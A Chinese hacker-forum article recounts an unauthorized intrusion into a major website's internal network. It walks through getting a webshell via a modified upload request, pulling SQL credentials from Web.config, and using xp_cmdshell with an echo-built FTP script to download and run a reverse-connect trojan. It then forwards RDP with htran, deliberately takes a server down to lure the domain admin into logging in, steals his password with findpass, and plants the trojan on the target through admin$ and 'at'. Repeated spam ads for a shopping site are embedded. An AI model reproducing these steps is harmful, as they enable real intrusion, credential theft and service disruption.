社会工程学的思维突破内网.doc

社会工程学的思维突破内网 文/KYO 前些天刚收到e-mail，得知我通过了CISP的考试。高兴之余把我渗透一个全世界排名100多名的大站的过程写出来，也好和大家一起学习，共同进步。 至于入侵的原因，我也不多说了。目标是mms.*.com，是用aspx写的，先用iiswrite.exe检测一下，结果如下：通过检测结果，大概可以了解到目标WEB服务器是win2000，我认为至少比win2003搞起来轻松点。不过通过域名查询知道，服务器IP没有绑定任何国际域名，首先旁注是没辙了。再从扫描的端口上来看，只开了21和80，只有ftp服务和web对外开放，肯定做了安全策略和安装了防火墙。既然开了FTP，就登陆试试看看返回的信息是什么吧。220 hw-9ab3d94fe590 Microsoft FTP Service (Version 5.0).从以上信息得知，服务器十有八九用的是微软自带的FTP（至于是否改了binner，尽量先不考虑），至少想从webshell上利用serv-u提升权限是不可能的了。另外还有一点信息hw-9ab3d94fe590即为该机器的机器名。那么FTP的帐户信息和该服务器的帐户应该是一一对应的，暴力破解的苦力活我是不做了，意义不大。然后再看80，aspx的，首先注入是找不到了，后台猜了半天也没猜出来，看来主动进攻不太好进行。*这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。http:/www.taotao520.net返利网,淘你喜欢,淘宝返利,淘宝返现购物。* 换个思路吧，看看他的C类段有没有弱弱的机子，经过扫描知道，那个C类网段基本都是这个网站的分站。经过艰苦的寻找和测试，利用一个扫描网站多级目录页面的办法找到一个上传页面，后面的事情大家都知道怎么做的，抓包，改数据，再用NC提交。不过第一次没有成功，提示写入失败，既然默认的目录不可写，那我们在网站上随便再找一个认为可写的目录再测试，经过查找源代码里面的信息，找到一个图片目录，然后再修改包的内容，再用NC提交，OK，这次成功了。拿到了他C类段一个站的WEBSHELL。通过服务器组建探测，知道他没有禁用WScript.Shell那么我们可以了解到很多信息。通过ipconfig /all 了解到他们的站基本上都是内网的服务，然后把一些服务的端口映射出来的。Net start发现本机开了终端和radmin，但是我们连不上的。再进入系统目录下，看他打补丁的情况，通过补丁编号，又知道他系统已经打上最新补丁。就算他们内网之间开了445，MS05039也用不了。再通过net localgroup administrators得到从这里我看到了希望，因为系统管理员有域管理员帐号，那么我们不管拿到哪台机子的系统权限，如果域管理员在线，findpass就可以得到域管理员密码了。好了，准备工作做了这么多，下面开始提升权限。幸好他网站数据库用的是ms sqlserver，找到Web.config,我们得到了sqlserver的用户名和密码，再利用2006自带的微软数据库查看/操作器连接数据库服务器。转到命令执行那里，exec master.dbo.xp_cmdshell “ping myip” ,马上看到我的天网有反映了，那么至少知道xp_cmdshell是可以用的。下面就简单了。利用以下脚本echo open myipkk1.txtecho kyokk1.txtecho kyo327kk1.txtecho get muma.exekk1.txtecho byekk1.txtftp -s:kk1.txt向数据库服务器上传我的反连的马。这样我们现在就拿到了数据库服务器的系统权限。可以看到我执行query user,显示没有用户。那怎么办？嗅探吧。不能远程登陆3389，我用htran.exe转出来再登陆。登上去以后准备再传一个cain，嗅探目标的21端口，虽然希望不大，可这也是没有办法的办法。为了不把我的shell弄死，我echo一个bat然后用at命令执行。具体语句为：echo htran -slave myip127.0.0.1 3389k.bat然后我在本机监听htran -listen 83 3389*这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。http:/www.taotao520.net返利网,淘你喜欢,淘宝返利,淘宝返现购物。*等任务时间一到，我马上打开终端登陆器，连接127.0.0.1，输入我刚加的用户名密码以后，却弹出以下画面：晕了，看来他们最后还有一手，哎，登陆终端又失败了。 想了许久，感觉突破口就是怎么才能让域管理登陆，我想如果他们网页坏了，他们肯定会去维护的，不过他也可以登陆ftp维护啊。最终的办法只有一个，先把得到WEBSHELL那个站的首页改名（呵呵，我不做破坏的），然后直接shutdown掉那台服务器。这样他就不得不登陆了。我是在半夜4点多做完了这件事，一直熬到8点钟，再刷新那个网站，发现已经恢复了，马上用我的后门登陆到他的CMD下的shell，执行query user,果然有域管理员在线，接着findpass，这就是我利用社会工程学拿到了域管理员密码的真实过程。并且我半个小时后再登陆后门query user，就发现没有用户了，看来他们的管理员也懂一点安全知识。幸亏我做的及时啊。拿到域管理员密码再进那个目标机就简单多了。过程就是利用以下语句Net use 10.0.0.192ipc$ “pass” /user:domainadministrator先和目标机建立ipc连接。这里肯定有人问了，你怎么得到目标机的内网IP的。其实前面已经做了铺垫，我由ftp返回的binner信息知道了目标机的机器名，那么我内网CMDSHELL下直接ping机器名就OK了。Copy muma.exe 10.0.0.192admin$system32muma.exe把木马copy到目标机Net time 10.0.0.192得到目标机的时间At 10.0.0.192 time muma.exe执行我的反连木马到此为止，我的这次入侵就结束了。说到底如何让域管理员登陆是最重要的，不然我的一切劳动都成为炮灰。其实社会工程学博大精深，我这次成功也许靠了那么一点运气。最后希望广大黑迷，如果有什么新的思路和技巧不妨写出来，大家共同学习，共同进步。*这里插播个广告，黑友们请无视，只是为朋友的网站能被搜索引擎收录，多加点流量。http:/www.taotao520.net返利网,淘你喜欢,淘宝返利,淘宝返现购物。*